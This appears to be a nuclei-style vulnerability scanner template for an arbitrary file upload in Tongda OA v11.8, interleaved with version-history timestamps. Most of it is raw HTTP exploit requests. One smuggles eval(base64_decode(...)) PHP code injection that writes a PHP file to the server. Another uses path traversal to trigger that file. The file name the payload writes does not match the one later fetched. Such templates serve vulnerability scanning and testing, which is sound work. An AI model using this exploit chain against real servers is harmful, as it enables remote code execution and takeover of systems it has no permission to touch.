2023-09-18 12:37:42 +00:00
id : tongda-api-file-upload
2023-08-18 03:22:06 +00:00
info :
2023-09-08 13:49:09 +00:00
name : Tongda OA v11.8 api.ali.php - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : critical
2023-09-08 13:49:09 +00:00
description : |
Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
2023-08-18 03:22:06 +00:00
reference :
2023-09-08 13:49:09 +00:00
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 3
fofa-query : app="TDXK-通达OA"
tags : tongda,oa,fileupload,intrusive
2023-08-18 03:22:06 +00:00
http :
- raw :
- |
POST /mobile/api/api.ali.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae
Accept-Encoding : gzip
--502f67681799b07e5de6b503655f5cae
2023-09-08 13:49:09 +00:00
Content-Disposition : form-data; name="file"; filename="{{randstr}}.json"
2023-08-18 03:22:06 +00:00
Content-Type : application/octet-stream
{"modular" : "AllVariable" , "a" : "ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==" , "dataAnalysis" : "{" a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
--502f67681799b07e5de6b503655f5cae--
- |
GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
- |
2023-09-08 13:49:09 +00:00
GET /{{randstr}}.php HTTP/1.1
2023-08-18 03:22:06 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers :
- type : dsl
dsl :
2023-09-08 13:49:09 +00:00
- 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
2023-09-18 12:37:42 +00:00
- 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'
2023-10-14 11:27:55 +00:00
condition : and